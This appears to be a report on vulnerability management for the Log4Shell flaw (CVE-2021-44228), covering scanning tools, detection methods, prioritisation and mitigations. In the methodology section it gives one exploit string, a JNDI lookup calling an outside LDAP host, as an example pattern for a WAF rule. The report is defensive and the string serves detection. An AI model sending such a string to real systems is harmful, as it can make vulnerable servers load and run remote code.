Our topic.

Vulnerability Management on zerodaylog4j

What is log4j?
Apache Log4j is a Java-based logging utility.Log4j Java library's role is to log information
that helps applications run smoothly, determine what's happening, and help with the
debugging process when errors occur

EXECUTIVE SUMMARY

A critical vulnerability was discovered on December 9,2021 in Apache Log4j – a popular Java
open-source logging library used in countless applications across the world. This vulnerability,
also named Log4 Shell or LogJam, is being traced as CVE-2021-44228 and it has been assigned
the maximum CVSS(Common Vulnerability Scoring System) score of 10. If exploited, it can
give a threat actor the ability to execute arbitrary code and potentially take full control of the
vulnerable system.This vulnerability is being actively exploited in the wild, and because of its
ease of exploitation, it is considered especially dangerous. Working Proof of Concepts (PoC) are
already available on the Internet, and even an inexperienced attacker can successfully execute an
attack using this vulnerability.
SCAN RESULTS

There are many Log4j vulnerability scanning tools available in the market to make it easy for

you to detect Log4j vulnerabilities in your systems and applications.

So, when you look for these tools, check their accuracy rates since many of them generate false

positives. Also, find a tool that can cater to your needs because they may focus on identifying

Log4j vulnerability, reporting the exposure, and remediating the vulnerability.

So, if your focus is detection, find a Log4j vulnerability scanner that can detect the issue or use

the one that can detect and remediate the issue.

Tools are : Microsoft 365 Defender, Google’s Cloud Logging detection, WhiteSource.

Methodology
It’s a little tricky to locate log4j vulnerabilities. Apache log4j 2 is built into web applications.

This makes it difficult to spot log4j vulnerabilities using scans that see your web app from the

“outside” like black box scans. This is why an internal vulnerability scan is vital for finding log4j

vulnerabilities.

A software management tool or a patch management tool are excellent choices for finding log4j

vulnerabilities in your application. These tools can check your application against the growing

list of applications and components known to be exposed to log4j vulnerabilities.

Web application security teams look for these types of vulnerabilities when testing your

application from the inside. A white box test run by cybersecurity experts can be one of the

fastest ways to discover and enumerate log4j vulnerabilities in your web app.
Log4j was a RCE(remote code execution) so the malicious patterns can be found on github and a

custom rule can be created in WAF to stop these requests to system/servers.

Common pattern consists of words like : jndi:ldap along with some random
symbols and characters
Example : ${jndi:ldap://prplbx.com/security}

Findings
Researchers observed attempted exploits of the Log4j vulnerability, known as Log4 Shell, on

more than 44% of corporate networks worldwide. That’s up from 40% a day earlier, according to

CheckPoint(Software company).

Cyber firm Bitdefender, meanwhile, reported that it has detected attempts to deploy a

ransomware payload targeting a Windows system by exploiting the Log4j vulnerability.

This was easily fixed by just updating the log4j to the latest version.

Risk Management

Step #1 – Keeping Your Open-Source Vulnerabilities in Check

With open-source security vulnerabilities, Software Composition Analysis (or SCA) tools are the

way to go. This family of automated tracking tools enables software developers and security

professionals to automatically detect all open-source components in an organization’s systems

Step #2 – Prioritize Your Vulnerabilities

Good news: you know what’s in your code, and what requires your attention.
Bad news: So many vulnerabilities, so little time. There are only so many hours in a developer’s

day, and your team is most probably racing through a sprint. There is no way your team can

attend to all the issues that your superior tracking processes have uncovered.

Step #3 – Who Goes First? How to Prioritize Open-Source Vulnerability Remediation

As we already know, the information about the vulnerability and its remediation might be found

in a number of repositories, advisories, and bug trackers, so a tool that aggregates all open-source

vulnerability information from across the open-source bazaar continuously will help your

organization get the most accurate information.

Let’s walk through the 3 steps we took in identifying, validating, and remediating the

vulnerabilities in the case of Log4j.

1. Vulnerabilities identified from scans were manually validated to ensure validity before

reporting to remediation teams

2. A vulnerability scan report with vulnerability details along with a manual validation

report containing the exact validation action steps to reproduce the vulnerability and best

practices/recommendations were sent to remediation teams.

3. assist with remediation directly with developers and application teams to help understand

the method of exploitation and validate fixed vulnerabilities.

Recommendations (Mitigation)
Mitigation Measures

When updates are available, agencies must update software using Log4j to the newest version, which is

the most effective and manageable long-term option. Where updating is not possible, the following

mitigating measures can be considered as a temporary solution and apply to the entire solution stack.
 ● Disable Log4j library. Disabling software using the Log4j library is an effective measure,
favoring controlled downtime over adversary-caused issues. This option could cause operational

impacts and limit visibility into other issues.

● Disable JNDI lookups or disable remote codebases. This option, while effective, may involve
developer work and could impact functionality.

● Disconnect affected stacks. Solution stacks not connected to agency networks pose a
dramatically lower risk from attack. Consider temporarily disconnecting the stack from agency

networks.

● Isolate the system. Create a “vulnerable network” VLAN and segment the solution stack from
the rest of the enterprise network.

● Deploy a properly configured Web Application Firewall (WAF) in front of the solution
stack. Deploying a WAF is an important, but incomplete, solution. While threat actors will be

able to bypass this mitigation, the reduction in alerting will allow an agency SOC to focus on a

smaller set of alerts.

● Apply micropatch. There are several micropatches available. They are not a part of the official
update but may limit agency risk.

Security Policy & Configuration

How to ensure you are protected from the Log4j Vulnerability

1. Make sure your IPS blade is in prevention mode

2. Make sure your AppSec is in prevention mode
3. Make sure Infinity NDR is configured to detect exploited servers and internal scans
on your network
4. Make sure your Harmony Endpoint is in prevention mode
5. Make sure you scan your code using SourceGuard
6. Scan Serverless functions with CloudGuard Workload Protection